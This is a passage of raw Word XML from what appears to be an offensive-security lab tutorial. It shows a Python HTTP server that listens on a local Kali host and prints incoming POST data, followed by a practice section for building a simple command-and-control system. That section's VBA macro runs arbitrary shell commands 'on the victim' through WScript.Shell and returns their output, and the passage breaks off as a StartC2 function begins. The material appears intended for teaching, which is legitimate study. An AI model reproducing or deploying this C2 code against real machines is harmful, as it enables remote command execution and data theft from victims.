            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F09ABD" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT = 8080  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766D1E1F" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="532986D1" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>class MyHandler(http.server.BaseHTTPRequestHandler):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B25EDFE" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    def do_POST(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792822F4" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D1EA3F" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        content_length = int(self.headers['Content-Length'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CAB7A3D" w14:textId="02698F13" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        post_data = self.rfile.read(content_length).decode('utf-8')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B3596A" w14:textId="14A54187" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        print(f"[+] Data received: {post_data}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757A20A1" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        self.send_response(200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6942BA9F" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        self.end_headers()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFE4299" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        self.wfile.write(b"OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4FBA69" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FAF51B8" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>with socketserver.TCPServer((HOST, PORT), MyHandler) as httpd:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DED82F" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    print(f"[*] Server running on {HOST}:{PORT}...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23199027" w14:textId="771862D4" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    httpd.serve_forever()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44C0C99C" w14:textId="78745F16" w:rsidR="008C43F6" w:rsidRDefault="00140D25" w:rsidP="00140D25">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C43F6">
        <w:t>Step 2. Run the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5F7D5" w14:textId="31D8EC9B" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1. Save the script as Server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9CFEC" w14:textId="3824CB2C" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>2. Open a terminal in Kali Linux and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769333E4" w14:textId="1996AF3A" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C43F6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#python3 server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FDEDC" w14:textId="22714F57" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>3. The server will start listening for incoming connections on 192.168.1.131:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD8642" w14:textId="6C148105" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A67E25" w14:textId="7B149DBA" w:rsidR="008C43F6" w:rsidRDefault="00140D25" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00140D25">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388BBAFA" wp14:editId="5CDF3C2E">
            <wp:extent cx="5761990" cy="2405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405380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD2663" w14:textId="1CF86637" w:rsidR="002702A3" w:rsidRDefault="002702A3" w:rsidP="002702A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>V. Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2145C" w14:textId="7833D1F8" w:rsidR="00A61341" w:rsidRDefault="00373D07" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F318FB" w:rsidRPr="00F318FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementing a Simple Command &amp; Control (C2) System using VBA and Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B1605" w14:textId="77777777" w:rsidR="008B5287" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD82682" w14:textId="2BEEF68E" w:rsidR="00F318FB" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VBA Macro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975686D" w14:textId="77777777" w:rsidR="008B5287" w:rsidRPr="00F318FB" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="432" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8632"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A61341" w14:paraId="1B5EF81D" w14:textId="77777777" w:rsidTr="00F318FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F64DE8E" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Function for running commands on the victim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBADA9B" w14:textId="1FD3ADF5" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Function RunCommand(command As String) As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C5523E" w14:textId="2BB3EAC3" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Redirect to error handling if an error occurs  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A615129" w14:textId="30420279" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    On Error GoTo error_handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F65A84E" w14:textId="4238E01F" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Create an Outlook application object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02737E9F" w14:textId="1AFAEF70" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Set objOL = CreateObject("Outlook.Application")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C4960C" w14:textId="039CDADE" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Create a Windows Shell object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CD3C75" w14:textId="33851EBC" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Set WshShell = CreateObject("Wscript.Shell")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14F8F2F5" w14:textId="3E4CD148" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Execute the given command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13950BCE" w14:textId="24057E0A" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Set WshShellExec = WshShell.Exec(command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C11908" w14:textId="227953E3" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Read and return the</w:t>
            </w:r>
            <w:r w:rsidR="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> data</w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F2AA43"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RunCommand = WshShellExec.StdOut.ReadAll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="137AB0AC"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Exit Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D87246" w14:textId="368BB130" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>error_handler:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2819494B" w14:textId="2870712D" w:rsidR="00F318FB" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Return "ERROR" if execution fails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA4E5AF"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RunCommand = "ERROR"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770C46E2" w14:textId="664D2044" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>End Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37DBB02A" w14:textId="77777777" w:rsidR="00F318FB" w:rsidRPr="00A61341" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D0843EA" w14:textId="0441AB16" w:rsidR="00A61341" w:rsidRPr="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F318FB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Function to start the C2 communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31222C92"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Function StartC2()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0714983C" w14:textId="0201FE79" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Dim objHTTP As Object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218C18D0" w14:textId="64E3467A" w:rsidR="00F318FB" w:rsidRPr="002C63AB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
